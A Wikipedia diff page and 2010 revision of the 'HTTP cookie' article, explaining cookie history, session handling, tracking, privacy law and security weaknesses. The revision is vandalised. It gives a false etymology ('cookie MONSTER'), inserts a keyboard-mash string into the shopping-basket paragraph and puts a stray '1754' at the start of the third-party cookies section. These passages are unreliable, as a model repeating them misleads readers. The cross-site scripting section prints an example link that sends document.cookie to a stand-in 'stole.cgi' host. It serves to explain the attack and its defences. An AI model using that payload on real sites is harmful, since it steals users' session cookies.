Jump to content

HTTP cookie: Difference between revisions

From Wikipedia, the free encyclopedia
Content deleted Content added
Line 11: Line 11:
== History ==
== History ==


The term "cookie" derives from "[[magic cookie]]", which is a packet of data a program receives and sends out again unchanged. Magic cookies were already used in computing when [[Lou Montulli]] had the idea of using them in Web communications in June 1994.<ref>John Schwartz. [http://www.nytimes.com/2001/09/04/technology/04COOK.html Giving the Web a memory cost its users privacy]. New York Times. September 4, 2001</ref> At the time, he was an employee of [[Netscape Communications]], which was developing an [[e-commerce]] application for a customer. Cookies provided a solution to the problem of reliably implementing a [[Shopping cart software|virtual shopping cart]].<ref name="ks">Jey Kesan and Rajiv Shah. [http://papers.ssrn.com/sol3/papers.cfm?abstract_id=597543 SSRN.com], Deconstructing Code. Chapter II.B (Netscape's cookies). Yale Journal of Law and Technology, 6, 277–389.</ref><ref name="kristol">David Kristol. HTTP Cookies: Standards, privacy, and politics. ACM Transactions on Internet Technology, 1(2), 151–198, 2001. {{doi|10.1145/502152.502153}}</ref>
The term "cookie MONSTER" derives from "[[magic cookie]]", which is a packet of data a program receives and sends out again unchanged. Magic cookies were already used in computing when [[Lou Montulli]] had the idea of using them in Web communications in June 1994.<ref>John Schwartz. [http://www.nytimes.com/2001/09/04/technology/04COOK.html Giving the Web a memory cost its users privacy]. New York Times. September 4, 2001</ref> At the time, he was an employee of [[Netscape Communications]], which was developing an [[e-commerce]] application for a customer. Cookies provided a solution to the problem of reliably implementing a [[Shopping cart software|virtual shopping cart]].<ref name="ks">Jey Kesan and Rajiv Shah. [http://papers.ssrn.com/sol3/papers.cfm?abstract_id=597543 SSRN.com], Deconstructing Code. Chapter II.B (Netscape's cookies). Yale Journal of Law and Technology, 6, 277–389.</ref><ref name="kristol">David Kristol. HTTP Cookies: Standards, privacy, and politics. ACM Transactions on Internet Technology, 1(2), 151–198, 2001. {{doi|10.1145/502152.502153}}</ref>


Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of [[Netscape Navigator|Mosaic Netscape]], released on October 13, 1994,<ref>[http://web.archive.org/web/20061207145832/http://wp.netscape.com/newsref/pr/newsrelease1.html Press Release: Netscape Communications Offers New Network Navigator Free On The Internet] </ref><ref>[http://groups.google.com/group/comp.infosystems.www.users/msg/9a210e5f72278328 Usenet Post by Marc Andreessen: Here it is, world!]</ref> supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and {{Cite patent|US|5774670}} was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.<ref>{{cite news|first=Sandi |last=Hardmeier |url=http://www.microsoft.com/windows/IE/community/columns/historyofie.mspx |title=The history of Internet Explorer |publisher=Microsoft |date=2005-08-25 |accessdate=2009-01-04}}</ref>
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of [[Netscape Navigator|Mosaic Netscape]], released on October 13, 1994,<ref>[http://web.archive.org/web/20061207145832/http://wp.netscape.com/newsref/pr/newsrelease1.html Press Release: Netscape Communications Offers New Network Navigator Free On The Internet] </ref><ref>[http://groups.google.com/group/comp.infosystems.www.users/msg/9a210e5f72278328 Usenet Post by Marc Andreessen: Here it is, world!]</ref> supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and {{Cite patent|US|5774670}} was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.<ref>{{cite news|first=Sandi |last=Hardmeier |url=http://www.microsoft.com/windows/IE/community/columns/historyofie.mspx |title=The history of Internet Explorer |publisher=Microsoft |date=2005-08-25 |accessdate=2009-01-04}}</ref>

Revision as of 16:20, 10 March 2010

A cookie (also tracking cookie, browser cookie, and HTTP cookie) is a small piece of text stored on a user's computer by a web browser. A cookie consists of one or more name-value pairs containing bits of information.

The cookie is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. A cookie can be used for authentication, session tracking (state maintenance), storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing textual data.

As text, cookies are not executable. Because they are not executed, they cannot replicate themselves and are not viruses. Due to the browser mechanism to set and read cookies, they can be used as spyware. Anti-spyware products may warn users about some cookies because cookies can be used to track people or violate privacy concerns.

Most modern browsers allow users to decide whether to accept cookies, and the time frame to keep them, but rejecting cookies makes some websites unusable.

History

The term "cookie MONSTER" derives from "magic cookie", which is a packet of data a program receives and sends out again unchanged. Magic cookies were already used in computing when Lou Montulli had the idea of using them in Web communications in June 1994.[1] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[2][3]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[4][5] supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and US 5774670  was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.[6]

The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of the presence of cookies. Some people were aware of the existence of cookies as early as the first quarter of 1995,[7] but the general public learned about them after the Financial Times published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the IETF was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by Brian Behlendorf and David Kristol respectively, but the group, headed by Kristol himself, soon decided to use the Netscape specification as a starting point. On February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.

At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was followed by RFC 2965 in October 2000.

Uses

Session management

Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"),[2][3] a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Shopping basket applications today usually store ASBUDBGLASUBERUBGAWERUKBGWERUBGAEUGthe list of basket contents in a database on the server side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier. The web browser will send back that session identifier with each subsequent request and shopping basket items are stored associated with a unique session identifier.

Allowing users to log in to a website is a frequent use of cookies. Typically the web server will first send a cookie containing a unique session identifier. Users then submit their credentials and the web application authenticates the session and allows the user access to services.

Personalization

Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.

Many websites use cookies for personalization based on users' preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page, the server is also sent the cookie where the preferences are stored, and can personalize the page according to the user preferences. For example, the Wikipedia website allows authenticated users to choose the webpage skin they like best; the Google search engine allows users (even non-registered ones) to decide how many search results per page they want to see.

Tracking

Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referer field of the HTTP header, but cookies allow for a greater precision. This can be done for example as follows:

  1. If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;
  2. From this point on, the cookie will be automatically sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence. For example, if the log contains some requests done using the cookie id=abc, it can be determined that these requests all come from the same user. The URL and date/time stored with the cookie allows for finding out which pages the user has visited, and at what time.

Third-party cookies and Web bugs, explained below, also allow for tracking across multiple sites. Tracking within a site is typically used to produce usage statistics, while tracking across sites is typically used by advertising companies to produce anonymous user profiles (which are then used to determine what advertisements should be shown to the user).

A tracking cookie may potentially infringe upon the user's privacy but they can be easily removed. Current versions of popular web browsers include options to delete 'persistent' cookies when the application is closed.

Third-party cookies

1754 When viewing a Web page, images or other objects contained within this page may reside on servers besides just the URL shown in your browser. While rendering the page, the browser downloads all these objects. Most modern websites that you view contain information from lots of different sources. For example, if you type www.domain.com into your browser, widgets and advertisements within this page are often served from a different domain source. While this information is being retrieved, some of these sources may set cookies in your browser. First-party cookies are cookies that are set by the same domain that is in your browser's address bar. Third-party cookies are cookies being set by one of these widgets or other inserts coming from a different domain.

Modern browsers, such as Mozilla Firefox, Internet Explorer and Opera, by default, allow third-party cookies, although users can change the settings to block them. There is no inherent security risk of third-party cookies (they do not harm the user's computer) and they make lots of functionality of the web possible, however some internet users disable them because they can be used to track a user browsing from one website to another. This tracking is most often done by on-line advertising companies to assist in targeting advertisements. For example: Suppose a user visits www.domain1.com and an advertiser sets a cookie in the user's browser, and then the user later visits www.domain2.com. If the same company advertises on both sites, the advertiser knows that this particular user who is now viewing www.domain2.com also viewed www.domain1.com in the past and may avoid repeating advertisements. The advertiser does not know anything more about the user than that—they do not know the user's name or address or any other personal information (unless they obtain it from another source such as from the user or by reading another cookie).

See misconceptions below for more details.

Implementation

A possible interaction between a Web browser and a server holding a Web page, in which the server sends a cookie to the browser and the browser sends it back when requesting another page.

Cookies are arbitrary pieces of data chosen by the Web server and sent to the browser. The browser returns them unchanged to the server, introducing a state (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a Web page or component of a Web page is an isolated event, mostly unrelated to all other views of the pages of the same site. Other than being set by a web server, cookies can also be set by a script in a language such as JavaScript, if supported and enabled by the Web browser.

Cookie specifications[8][9] suggest that browsers should be able to save and send back a minimal number of cookies. In particular, an internet browser is expected to be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies per server or domain.

According to section 3.1 of RFC 2965, cookie names are case insensitive.

The cookie setter can specify a deletion date, in which case the cookie will be removed on that date. If the cookie setter does not specify a date, the cookie is removed once the user quits his or her browser. As a result, specifying a date is a way for making a cookie survive across sessions. For this reason, cookies with an expiration date are called persistent. As an example application, a shopping site can use persistent cookies to store the items users have placed in their basket. (In reality, the cookie may refer to an entry in a database stored at the shopping site, not on your computer.) This way, if users quit their browser without making a purchase and return later, they still find the same items in the basket so they do not have to look for these items again. If these cookies were not given an expiration date, they would expire when the browser is closed, and the information about the basket content would be lost.

Cookies can also be limited in scope to a specific domain, subdomain or path on the web server which created them.

Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request. For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that looks like the following one:

GET /index.html HTTP/1.1
Host: www.example.org

browser
server

The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'. This packet may contain lines requesting the browser to store cookies:

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
 
(content of page)

browser
server

The server sends the line Set-Cookie only if the server wishes the browser to store a cookie. Set-Cookie is a request for the browser to store the string name=value and send it back in all future requests to the server. If the browser supports cookies and cookies are enabled, every subsequent page request to the same server will include the cookie. For example, the browser requests the page http://www.example.org/spec.html by sending the server www.example.org a request like the following:

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: name=value
Accept: */*
 

browser
server

This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one. The server answers by sending the requested page, possibly adding other cookies as well.

The value of a cookie can be modified by the server by sending a new Set-Cookie: name=newvalue line in response of a page request. The browser then replaces the old value with the new one.

The term "cookie crumb" is sometimes used to refer to the name-value pair.[10] This is not the same as breadcrumb web navigation, which is the technique of showing in each page the list of pages the user has previously visited; this technique, however, may be implemented using cookies.

The Set-Cookie line is typically not created by the base HTTP server but by a CGI program. The basic HTTP server facility (e.g. Apache) just sends the result of the program (a document preceded by the header containing the cookies) to the browser.

Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.[11]

Example of an HTTP response from google.com, which sets a cookie with attributes.

Beside the name/value pair, a cookie may also contain an expiration date, a path, a domain name, and whether the cookie is intended only for encrypted connections. RFC 2965 also specifies that cookies must have a mandatory version number, but this is usually omitted. These pieces of data follow the name=newvalue pair and are separated by semicolons. For example, a cookie can be created by the server by sending a line Set-Cookie: name=newvalue; expires=date; path=/; domain=.example.org.

The domain and path tell the browser that the cookie has to be sent back to the server when requesting URLs of a given domain and path. If not specified, they default to the domain and path of the object that was requested. As a result, the domain and path strings may tell the browser to send the cookie when it normally would not. For security reasons, the cookie is accepted only if the server is a member of the domain specified by the domain string.

Cookies are actually identified by the combination of their name, domain, and path, as opposed to only their name (the original Netscape specification considers only their name and path). In other words, same name but different domains or paths identify different cookies with possibly different values. As a result, cookie values are changed only if a new value is given for the same name, domain, and path.

The expiration date tells the browser when to delete the cookie. If no expiration date is provided, the cookie is deleted at the end of the user session, that is, when the user quits the browser. As a result, specifying an expiration date is a means for making cookies survive across browser sessions. For this reason, cookies that have an expiration date are called persistent.

The expiration date is specified in the "Wdy, DD-Mon-YYYY HH:MM:SS GMT" format. As an example, the following is a cookie sent by a Web server (the value string has been changed):

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.example.net

The name of this particular cookie is RMID, while its value is the string 732423sdfs73242. The server can use an arbitrary string as the value of a cookie. The server may collapse the value of a number of variables in a single string, like for example a=12&b=abcd&c=32. The path and domain strings / and .example.net tell the browser to send the cookie when requesting an arbitrary page of the domain .example.net, with an arbitrary path.

Expiration

Cookies expire, and are therefore not sent by the browser to the server, under any of these conditions:

  1. At the end of the user session (i.e. when the browser is shut down) if the cookie is not persistent
  2. An expiration date has been specified, and has passed
  3. The expiration date of the cookie is changed (by the server or the script) to a date in the past
  4. The browser deletes the cookie by user request

The third condition allows a server or script to explicitly delete a cookie. Note that the browser doesn't send to the server information about cookie lifetime, so there is no way for the server to check if the cookie expires soon.

Misconceptions

Since their introduction on the Internet, misconceptions about cookies have circulated on the Internet and in the media.[12][13] In 1998, CIAC, a computer incident response team of the United States Department of Energy, found the security vulnerability "essentially nonexistent" and explained that "information about where you come from and what web pages you visit already exists in a web server's log files".[14] In 2005, Jupiter Research published the results of a survey,[15] according to which a consistent percentage of respondents believed some of the following false claims:

Cookies cannot erase or read information from the user's computer.[16] However, cookies allow for detecting the Web pages viewed by a user on a given site or set of sites. This information can be collected in a profile of the user. Some profiles are anonymous, meaning they contain no personal information, yet even such profiles can be controversial.[citation needed]

According to the same survey, a large percentage of Internet users do not know how to delete cookies. One reason people do not trust the concept of cookies is because some sites have abused the personal identification aspect of cookies and have shared them. A large percentage of targeted advertising comes from information gleaned from tracking cookies.

Browser settings

Most modern browsers support cookies and allow the user to disable them. The following are common options:[17]

  1. To enable or disable cookies completely, so that they are always accepted or always blocked.
  2. To allow the user to see the cookies that are active with respect to a given page by typing javascript:alert(document.cookie) in the browser URL field. Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.

Most browsers also allow a full wipe of private data including cookies. Add-on tools for managing cookie permissions also exist.[18][19][20][21]

Privacy and third-party cookies

Cookies have some important implications on the privacy and anonymity of Web users. While cookies are sent only to the server setting them or the server in the same Internet domain, a Web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. This includes cookies from unwanted pop-up ads.

In this fictional example, an advertising company has placed banners in two Web sites. Hosting the banner images on its servers and using third-party cookies, the advertising company is able to track the browsing of users across these two sites.

Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. Knowledge of the pages visited by a user allows the advertisement company to target advertisement to the user's presumed preferences.

The possibility of building a profile of users is considered by some a potential privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.

The United States government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers which had visited its web site. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them.[22] On December 25, 2005, Brandt discovered that the National Security Agency had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the National Security Agency immediately disabled the cookies.[23]

The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies.[24] In particular, Article 5, Paragraph 3 of this directive mandates that storing data (like cookies) in a user's computer can only be done if:

  1. the user is provided information about how this data is used;
  2. the user is given the possibility of denying this storing operation. However, this article also states that storing data that is necessary for technical reasons is exempted from this rule. This directive was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia, Latvia, Greece, Belgium, and Luxembourg) did not even implement the provision in national law. The same report suggests a thorough analysis of the situation in the Member States.

The P3P specification includes the possibility for a server to state a privacy policy, which specifies which kind of information it collects and for which purpose. These policies include (but are not limited to) the use of information gathered using cookies. According to the P3P specification, a browser can accept or reject cookies by comparing the privacy policy with the stored user preferences or ask the user, presenting them the privacy policy as declared by the server.

Many web browsers including Apple's Safari and Microsoft Internet Explorer versions 6 and 7 support P3P which allows the web browser to determine whether to allow 3rd party cookies to be stored. The Opera web browser allows users to refuse third-party cookies and to create global and specific security profiles for Internet domains.[25] Firefox 2.x dropped this option from its menu system but it restored it with the release of version 3.x.

Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's Web experience.[26] Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[27]

Drawbacks of cookies

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are at odds with the Representational State Transfer (REST) software architectural style.[28]

Inaccurate identification

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.

Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.

A cookie can be stolen by another computer that is allowed reading from the network

During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.

Cookies can be stolen via packet sniffing in an attack called session hijacking. Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver (particularly on unencrypted public Wi-Fi networks). This traffic includes cookies sent on ordinary unencrypted http sessions. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.

This issue can be overcome by securing the communication between the user's computer and the server by employing Transport Layer Security (https protocol) to encrypt the connection. A server can specify the secure flag while setting a cookie; the browser will then send it only over a secure channel, such as an SSL connection.[29]

However a large number of websites, although using encrypted https communication for user authentication (i.e. the login page), subsequently send session cookies and other data over ordinary, unencrypted http connections for performance reasons. Attackers can therefore easily intercept the cookies of other users and impersonate them on the relevant websites[30] or use them in a cookiemonster attack.

Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

A different way to steal cookies is cross-site scripting and making the browser itself send cookies to malicious servers that should not receive them. Modern browsers allow execution of pieces of code retrieved from the server. If cookies are accessible during execution, their value may be communicated in some form to servers that should not access them. Encrypting cookies before sending them on the network does not help against this attack.[31]

This type of cross-site scripting is typically exploited by attackers on sites that allow users to post HTML content. By embedding a suitable piece of code in an HTML post, an attacker may receive cookies of other users. Knowledge of these cookies can then be exploited by connecting to the same site using the stolen cookies, thus being recognised as the user whose cookies have been stolen.

A way for preventing such attacks is by using the HttpOnly flag;[32] this is an option, first introduced by Microsoft in Internet Explorer version 6[33] and implemented in PHP since version 5.2.0[34] that is intended to make a cookie inaccessible to client side script. However, web developers should consider developing their websites so that they are immune to cross-site scripting.[35]

Another potential security threat using cookies is the Cross-Site Request Forgery.

Cookie poisoning: an attacker sends a server an invalid cookie, possibly modifying a valid cookie it previously received from the server.

The cookie specifications constrain cookies to be sent back only to the servers in the same domain as the server from which they originate. However, the value of cookies can be sent to other servers using means different from the Cookie header.

In particular, scripting languages such as JavaScript and JScript are usually allowed to access cookie values and have some means to send arbitrary values to arbitrary servers on the Internet. These facts are used in combination with sites allowing users to post HTML content that other users can see.

As an example, an attacker running the domain example.com may post a comment containing the following link to a popular blog they do not otherwise control:

<a href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here!</a>

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the example.com server, and the attacker is then able to collect the cookies of other users.

This type of attack is difficult to detect on the user side because the script is coming from the same domain that has set the cookie, and the operation of sending the value appears to be authorised by this domain. It is usually considered the responsibility of the administrators running sites where users can post to disallow the posting of such malicious code.

Cookies are not directly visible to client-side programs such as JavaScript if they have been sent with the HttpOnly flag. From the point of view of the server, the only difference with respect of the normal case is that the set-cookie header line is added a new field containing the string `HttpOnly':

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.example.net; HttpOnly

When the browser receives such a cookie, it is supposed to use it as usual in the following HTTP exchanges, but not to make it visible to client-side scripts.[32] The `HttpOnly` flag is not part of any standard, and is not implemented in all browsers. Note that there is currently no prevention of reading or writing the session cookie via an XMLHTTPRequest.[36]

While cookies are supposed to be stored and sent back to the server unchanged, an attacker may modify the value of cookies before sending them back to the server. If, for example, a cookie contains the total value a user has to pay for the items in their shopping basket, changing this value exposes the server to the risk of making the attacker pay less than the supposed price. The process of tampering with the value of cookies is called cookie poisoning, and is sometimes used after cookie theft to make an attack persistent.

In cross-site cooking, the attacker exploits a browser bug to send an invalid cookie to a server.

Most websites, however, store only a session identifier — a randomly generated unique number used to identify the user's session — in the cookie itself, while all the other information is stored on the server. In this case, the problem of cookie poisoning is largely eliminated.

Cross-site cooking

Each site is supposed to have its own cookies, so a site like example.com should not be able to alter or set cookies for another site, like example.org. Cross-site cooking vulnerabilities in web browsers allow malicious sites to break this rule. This is similar to cookie poisoning, but the attacker exploits non-malicious users with vulnerable browsers, instead of attacking the actual site directly. The goal of such attacks may be to perform session fixation.

Users are advised to use the more recent versions of web browsers in which such issues are mitigated.

Inconsistent state on client and server

The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is realized using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item in the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situations as this.

Persistent cookies have been criticized by privacy experts for not being set to expire soon enough, and thereby allowing websites to track users and build up a profile of them over time.[37] This aspect of cookies also compounds the issue of session hijacking, because a stolen persistent cookie can potentially be used to impersonate a user for a considerable period of time.

Alternatives to cookies

Some of the operations that can be realized using cookies can also be realized using other mechanisms.

IP address

Users may be tracked based on the IP address of the computer requesting the page. This technique has been available since the introduction of the World Wide Web, as downloading pages requires the server to know the IP address of the computer running the browser or the proxy, if any is used. The server can track this information whether or not cookies are used. However, these addresses are typically less reliable in identifying a user than cookies because computers and proxies may be shared by several users, and the same computer may be assigned different IP addresses in different work sessions (as is often the case for dial-up connections).

Tracking by IP addresses can be reliable in some situations, such as the case of always-on broadband connections which retain the same IP address for long periods of time, so long as the power stays on.

Some systems such as Tor are designed to retain Internet anonymity and make tracking by IP address impractical or impossible.

URL (query string)

A more precise technique is based on embedding information into URLs. The query string part of the URL is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.

This method consists of the Web server appending query strings to the links of a Web page it holds when sending it to a browser. When the user follows a link, the browser returns the attached query string to the server.

Query strings used in this way and cookies are very similar, both being arbitrary pieces of information chosen by the server and sent back by the browser. However, there are some differences: since a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.

Moreover, even if the same user accesses the same page two times, there is no guarantee that the same query string is used in both views. For example, if the same user arrives to the same page but coming from a page internal to the site the first time and from an external search engine the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string.

Other drawbacks of query strings are related to security: storing data that identifies a session in a query string enables or simplifies session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

A form of session tracking, used by ASP.NET, is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks; and if the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie.

This approach presents two advantages from the point of view of the tracker: first, having the tracking information placed in the HTML source and POST input rather than in the URL means it will not be noticed by the average user; second, the session information is not copied when the user copies the URL (to save the page on disk or send it via email, for example).

window.name

All current web browsers can store a fairly large amount of data (2-32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies and is also cross-domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables[38] on the client side.

The downside is that every separate window or tab will initially have an empty window.name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. Furthermore window.name can be used for tracking visitors across different web sites, making it of concern for Internet privacy.

In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to network cookie sniffing attacks. However if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different web sites opened in the same window or tab.

HTTP authentication

The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a Web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent pages request. This information can be used to track the user.

Adobe Flash Local Shared Objects

If a browser includes the Adobe Flash Player plugin (formerly developed by Macromedia), the Local Shared Objects functionality can be used in a way very similar to cookies. Local Shared Objects may be an attractive choice to web developers because a majority of Windows users have Flash Player installed, the default size limit is 100 kB, and the security controls are distinct from the user controls for cookies, so Local Stored Objects may be enabled when cookies are not.

In some cases, web sites have created Flash LSOs that behave differently than what a user specifies for his http cookies, which has raised concern that web sites need to specify a consistent privacy policy across different types of cookies.[39]

The major drawback with this approach is the same as every platform/vendor-specific approach: it breaks the web's global accessibility and interoperability, tying up web development to a specific client's platform, excluding users who use standards-compliant web user agents and instead forcing them to use platform/vendor-specific web agents, which perpetuates vendor lock-in.

Client-side persistence

Some web browsers support a script-based persistence mechanism that allows the page to store information locally for later retrieval. Internet Explorer, for example, supports persisting information in the browser's history, in favorites, in an XML store, or directly within a Web page saved to disk.[40] With HTML 5 there will be a DOM Storage (localStorage) method, currently supported by only some browsers. For Internet Explorer 5+ there is a userdata method[41] available through DHTML Behaviours.

A different mechanism relies on browsers normally caching (holding in memory instead of reloading) JavaScript programs used in web pages. As an example, a page may contain a link such as <script type="text/javascript" src="example.js">. The first time this page is loaded, the program example.js is loaded as well. At this point, the program remains cached and is not reloaded the second time the page is visited. As a result, if this program contains a statement such as id=3243242 (global variable), this identifier remains valid and can be exploited by other JavaScript code the next times the page is loaded, or another page linking the same program is loaded.[citation needed] The major drawback of this method is that the global JavaScript variable must be static, meaning that it cannot be changed or deleted persistently like a cookie.

See also

References

  1. ^ John Schwartz. Giving the Web a memory cost its users privacy. New York Times. September 4, 2001
  2. ^ a b Jey Kesan and Rajiv Shah. SSRN.com, Deconstructing Code. Chapter II.B (Netscape's cookies). Yale Journal of Law and Technology, 6, 277–389.
  3. ^ a b David Kristol. HTTP Cookies: Standards, privacy, and politics. ACM Transactions on Internet Technology, 1(2), 151–198, 2001. doi:10.1145/502152.502153
  4. ^ Press Release: Netscape Communications Offers New Network Navigator Free On The Internet
  5. ^ Usenet Post by Marc Andreessen: Here it is, world!
  6. ^ Hardmeier, Sandi (2005-08-25). "The history of Internet Explorer". Microsoft. Retrieved 2009-01-04.
  7. ^ Roger Clarke. Cookies
  8. ^ "Persistent client state HTTP cookies: Preliminary specification". Netscape. c1999. Archived from the original on 2007-08-05. {{cite web}}: Check date values in: |date= (help)
  9. ^ RFC 2965 - HTTP State Management Mechanism (IETF)
  10. ^ "Cookie Property". MSDN. Microsoft. Retrieved 2009-01-04.
  11. ^ Shannon, Ross (2007-02-26). "Cookies - set and retrieve information about your readers". HTMLSource. Retrieved 2009-01-04.
  12. ^ "Contrary to popular belief, cookies are good for you! (on the Internet)". The All I Need. Retrieved 2009-01-04.
  13. ^ Keith C. Ivey Untangling the Web Cookies: Just a Little Data Snack. 1998
  14. ^ "I-034: Internet Cookies". CIAC, United States Department of Energy (ciac.org). March 12, 1998, revised February 1, 2007. Retrieved 2007-11-05. {{cite web}}: Check date values in: |date= (help)
  15. ^ Brian Quinton. Study: Users Don't Understand, Can’t Delete Cookies. Direct. May 18, 2005
  16. ^ Adam Penenberg. Cookie Monsters. Slate, November 7, 2005
  17. ^ Whalen, David (06/08/2002). "The Unofficial Cookie FAQ". 2.6. Cookie Central. Retrieved 2009-01-04. {{cite web}}: Check date values in: |date= (help)
  18. ^ "How to Manage Cookies in Internet Explorer 6". Microsoft. December 18, 2007. Retrieved 2009-01-04.
  19. ^ "Clearing private data". Firefox Support Knowledge base. Mozilla. 16 September, 2008. Retrieved 2009-01-04. {{cite web}}: Check date values in: |date= (help)
  20. ^ "Clear Personal Information : Clear browsing data". Google Chrome Help. Google. Retrieved 2009-01-04.
